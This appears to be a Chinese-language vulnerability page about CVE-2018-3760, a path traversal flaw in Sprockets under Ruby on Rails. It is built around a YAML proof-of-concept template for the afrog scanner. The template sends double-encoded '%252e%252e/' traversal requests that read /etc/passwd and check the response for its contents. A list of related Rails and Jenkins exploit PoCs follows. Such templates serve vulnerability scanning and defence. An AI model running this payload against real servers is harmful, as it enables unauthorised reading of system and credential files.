CVE-2018-3760: Ruby On Rails Path Traversal

日期: 2025-09-01 | 影响软件: Ruby On Rails | POC: 已公开

漏洞描述

Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器，Ruby On Rails是著名Ruby Web开发框架，Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中，存在一处因为二次解码导致的路径穿越漏洞，攻击者可以利用%252e%252e/来跨越到根目录，读取或执行目标服务器上任意文件。 title="Ruby On Rails"

PoC代码[已公开]

id: CVE-2018-3760

info:
    name: Ruby On Rails Path Traversal
    author: leezp
    severity: high
    description: |
        Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器，Ruby On Rails是著名Ruby Web开发框架，Sprockets是编译及分发静态资源文件的Ruby库。
        Sprockets 3.7.1及之前版本中，存在一处因为二次解码导致的路径穿越漏洞，攻击者可以利用%252e%252e/来跨越到根目录，读取或执行目标服务器上任意文件。
        title="Ruby On Rails"
    reference:
        - http://wiki.peiqi.tech/wiki/frame/Rails/Rails%20sprockets%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-3760.html

rules:
    r0:
        request:
            method: GET
            path: /assets/file:%2f%2f/etc/passwd
        expression: response.status == 500 && response.body.bcontains(b"FileOutsidePaths")
        output:
            search: '"/etc/passwd is no longer under a load path: (?P<path>.*?),".bsubmatch(response.body)'
            path: search["path"]
    r1:
        request:
            method: GET
            path: /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2018/CVE-2018-3760.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2015-3224: Ruby on Rails Web Console - Remote Code Execution POC

CVE-2018-3760: Ruby On Rails - Local File Inclusion POC

CVE-2020-8163: Ruby on Rails <5.0.1 - Remote Code Execution POC

CVE-2018-1000600: Pre-auth Fully-responded SSRF POC

CVE-2018-1000861: Jenkins 2.138 Remote Command Execution POC